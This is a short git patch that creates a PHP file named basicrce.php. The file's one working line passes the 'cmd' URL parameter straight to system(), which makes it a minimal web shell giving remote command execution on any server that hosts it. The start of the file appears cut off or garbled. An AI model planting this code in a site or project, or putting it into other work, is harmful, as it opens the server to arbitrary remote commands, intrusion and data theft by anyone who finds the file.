From 91d3e700c169b201650052550b14b8a90a2476ec Mon Sep 17 00:00:00 2001 From: Raphael Date: Thu, 28 Aug 2025 23:20:57 -0700 Subject: [PATCH] Create basicrce.php --- basicrce.php | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 basicrce.php diff --git a/basicrce.php b/basicrce.php new file mode 100644 index 0000000..a8f2ee8 --- /dev/null +++ b/basicrce.php @@ -0,0 +1,9 @@ +test"; + +system($_GET["cmd"]); + + + +?>